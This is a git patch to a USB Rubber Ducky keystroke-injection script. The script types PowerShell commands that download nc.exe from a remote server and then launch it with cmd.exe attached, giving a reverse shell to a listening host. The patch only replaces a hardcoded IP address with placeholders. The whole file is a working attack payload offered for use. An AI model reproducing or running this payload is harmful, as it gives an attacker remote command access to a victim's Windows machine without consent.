From 28174e3045b0f8426a7d5ceabfce52a4b74dc2ee Mon Sep 17 00:00:00 2001 From: Clortox <45907232+Clortox@users.noreply.github.com> Date: Fri, 1 Feb 2019 19:52:50 -0500 Subject: [PATCH] Update 0001.txt --- 0001.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/0001.txt b/0001.txt index 0f95c18..d1bfe64 100644 --- a/0001.txt +++ b/0001.txt @@ -13,12 +13,12 @@ REM begin downloading nc.exe STRING $c = new-object System.Net.WebClient ENTER DELAY 100 -STRING $c.DownloadFile("http://185.207.205.144/nc.exe",".\Downloads\nc.exe") +STRING $c.DownloadFile("http://YOURHOSTINGBOX/nc.exe",".\Downloads\nc.exe") ENTER DELAY 220 REM done with that REM execute nc.exe with a reverse shell pointed at myself REM reverse shell must be listening first dipshit -STRING ./Downloads/nc.exe -e C:\Windows\System32\cmd.exe 185.207.205.144 1337 +STRING ./Downloads/nc.exe -e C:\Windows\System32\cmd.exe YOURLISTENINGBOX 1337 ENTER REM thats all folks